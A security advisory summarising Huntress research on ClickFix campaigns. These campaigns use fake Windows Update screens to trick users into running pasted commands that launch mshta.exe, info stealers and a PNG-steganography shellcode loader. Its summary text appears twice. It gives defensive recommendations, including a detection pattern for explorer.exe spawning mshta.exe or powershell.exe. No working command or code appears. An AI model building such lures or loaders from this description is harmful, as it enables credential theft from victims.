ClickFix Gets Creative: Malware Buried in Images
Summary:
ClickFix is a social‑engineering technique that tricks users to open the Windows Run dialog (Win+R) and execute a command silently copied to their clipboard. Earlier versions of this tactic relied on simple “Human Verification” or robot‑check pages, but attackers have recently changed up their tactics.
New campaigns observed by security firm Huntress deploy highly realistic fake Windows Update screens, complete with full‑screen blue splash pages and progress animations, to convince victims that a system update is in progress. When the fake update “finishes,” users are instructed to perform the familiar ClickFix action, which involves opening the Windows Run and pasting/executing a malicious command. In turn, the victim unknowingly launches mshta.exe, kicking off a multi‑stage infection chain.
Security Officer Comments:
According to Huntress, the latest ClickFix attacks lead to the deployment of info stealers like Rhadamanthys and LummaC2, which are designed to locate and exfiltrate data from victim systems. This includes browser credentials, banking information, keystrokes, screenshots, and other valuable information that can be used for further compromise. One of the interesting aspects of this campaign is its use of a .NET steganographic loader, which conceals shellcode within the pixel data of a PNG image. Instead of appending malicious content to the file, the loader AES‑decrypts an embedded PNG resource, reads its raw bitmap bytes, and reconstructs the shellcode from a single color channel using a custom XOR‑based decoding routine.
Suggested Corrections:
Recommendations from Huntress:
https://www.huntress.com/blog/clickfix-malware-buried-in-images
ClickFix is a social‑engineering technique that tricks users to open the Windows Run dialog (Win+R) and execute a command silently copied to their clipboard. Earlier versions of this tactic relied on simple “Human Verification” or robot‑check pages, but attackers have recently changed up their tactics.
New campaigns observed by security firm Huntress deploy highly realistic fake Windows Update screens, complete with full‑screen blue splash pages and progress animations, to convince victims that a system update is in progress. When the fake update “finishes,” users are instructed to perform the familiar ClickFix action, which involves opening the Windows Run and pasting/executing a malicious command. In turn, the victim unknowingly launches mshta.exe, kicking off a multi‑stage infection chain.
Security Officer Comments:
According to Huntress, the latest ClickFix attacks lead to the deployment of info stealers like Rhadamanthys and LummaC2, which are designed to locate and exfiltrate data from victim systems. This includes browser credentials, banking information, keystrokes, screenshots, and other valuable information that can be used for further compromise. One of the interesting aspects of this campaign is its use of a .NET steganographic loader, which conceals shellcode within the pixel data of a PNG image. Instead of appending malicious content to the file, the loader AES‑decrypts an embedded PNG resource, reads its raw bitmap bytes, and reconstructs the shellcode from a single color channel using a custom XOR‑based decoding routine.
Suggested Corrections:
Recommendations from Huntress:
- Block the Windows Run box: Implement the registry modifications above or deploy GPO policies to block interaction with the Windows Run Box
- Security Awareness Training: Ensure users are trained on the ClickFix methodology, emphasising that legitimate CAPTCHA or Windows Update processes will never require pasting and running commands
- Monitor for suspicious process lineage: Use EDR telemetry to monitor for explorer.exe spawning mshta.exe, powershell.exe, or other living-off-the-land binaries with unexpected command lines
- Audit the RunMRU Registry Artefact: When investigating potential compromise, analysts can potentially verify if a user has entered commands into the Windows Run box by inspecting the “Most Recently Used” (MRU) list:
- HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
https://www.huntress.com/blog/clickfix-malware-buried-in-images